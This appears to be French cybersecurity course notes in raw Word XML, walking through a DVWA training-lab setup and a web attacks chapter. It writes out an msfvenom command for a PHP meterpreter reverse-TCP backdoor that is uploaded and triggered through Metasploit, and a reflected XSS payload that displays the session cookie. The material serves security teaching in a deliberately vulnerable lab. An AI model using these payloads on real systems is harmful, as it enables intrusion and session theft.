        <w:lastRenderedPageBreak/>
        <w:t>Contrefaçon de requête côté serveur (Server-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Side</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Forgery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> - SSRF)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Cette </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulné</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permet aux attaquants d’effectuer des requêtes non autorisées depuis le serveur vers d’autres ressources internes ou externes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69C9FF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_pduq8tr5b0sl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="95"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre 3 - Attaques WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477018C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34831D65" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Installation et config d’un serveur DVWA (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Damn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Web App) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B74C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438AA10C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DVWA est une app web PHP/MySQL, dont l’objectif principal est de permettre aux pro de la sécu de tester </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>leur compétences</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et leur outils dans un environnement légal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38512526" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0AE9D7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_p4c2yc7pmz5w" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Installation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B99812" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>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23B72" w:rsidRPr="00534394" w14:paraId="33F16FEE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAD3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="100BE8DF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRPr="00BD3814" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>apt-get -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> install apache2 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>mariadb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">-server </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>php-mysqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>php-gd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD3814">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> libapache2-mod-php git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="505FCAC9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRPr="00BD3814" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F36C3F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRPr="00BD3814" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>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23B72" w14:paraId="31EF463E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAD3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="668C5D97" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>git clone https://github.com/digininja/DVWA.git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="436690F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_4ub3anxzniv7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="50D32DEA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_98ic8527a19o" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="98"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">2 - Configuration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509544F8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0983CB91" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start le service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20253B9D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4F6CC9E1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Config du serveur MYSQL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89A065" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="61FCC864" wp14:editId="39A0946C">
            <wp:extent cx="4948238" cy="3920780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4948238" cy="3920780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB0C80" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Regarder la fiche pour plus d’infos sur l’installation et la config </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B3AC1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1989D70E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">On accède à la page web DVWA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580BFEDD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="606AC2E2" wp14:editId="7AC33529">
            <wp:extent cx="5731200" cy="43053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731200" cy="4305300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D48C3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4D1D50EF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_oawxnswonms0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="99"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>4 - Création d’une porte dérobée en utilisant PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6B078" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="139CEF05" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Création d’une porte dérobée PHP malveillante </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A5D60" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2DDB56AA" wp14:editId="52987978">
            <wp:extent cx="5731200" cy="1308100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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5731200" cy="1308100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="052CD517" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IP machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : 10.71.121.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F78316" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">la commande : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=10.71.121.135 LPORT=6000 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfv-shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="696CB184" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="09E2FC95" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="64009B9F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="065F0525" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="065522E1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0B27BB54" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Télécharger le fichier sur DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A31BA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3E78D5E6" wp14:editId="3CB2A236">
            <wp:extent cx="4587713" cy="334272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4587713" cy="3342720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62667D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D02B2EA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Contrôler que le fichier est bien dans le répertoire </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uploads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9664E5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="13A96D47" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="65D1E63A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lancer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Framework : dans le terminal tapez </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et config de l’exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A2A11" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2C05BA4D" wp14:editId="72C8D6CA">
            <wp:extent cx="3557588" cy="1011555"/>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3557588" cy="1011555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACB6B4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1DE4F3C7" wp14:editId="7368DE73">
            <wp:extent cx="5400675" cy="504825"/>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400675" cy="504825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E9D9C6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="192AD4B8" wp14:editId="1B2F62E6">
            <wp:extent cx="3500438" cy="605998"/>
            <wp:effectExtent l="0" t="0" r="0" b="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3500438" cy="605998"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="03F1D30C" wp14:editId="6F3A1D64">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-247649</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>704850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5491731" cy="2550998"/>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491731" cy="2550998"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63547E95" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3B890B6C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1387FA4A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6299AA5E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3C29CEE9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2AF396AA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5DE7BF50" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1EA34BD0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="79A025AD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0FD26A1E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilisation de l’exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163DB593" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Lancer l’exploit et prendre le contrôle de la cible </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B967A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3278AA80" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5A31C4B8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_l52jglxsqtge" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Réalisation d’attaque XSS : Injection de code malveillant dans une page consulté </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254A6FA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4496A062" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_yf8jk5enuv5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="101"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Connectez-vous au DVWA et cliquez sur XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6193A817" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dans le champ “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>what</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>your</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4680C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:tab/>
        <w:t>Saisir le script suivant : &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56389190" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="53352F3B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Dans ce script, nous demandons à l’application Web de nous alerter en affichant une fenêtre contextuelle &lt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; qui nous fournira les valeurs actuelles du cookie et de PHPSESSID. </w:t>
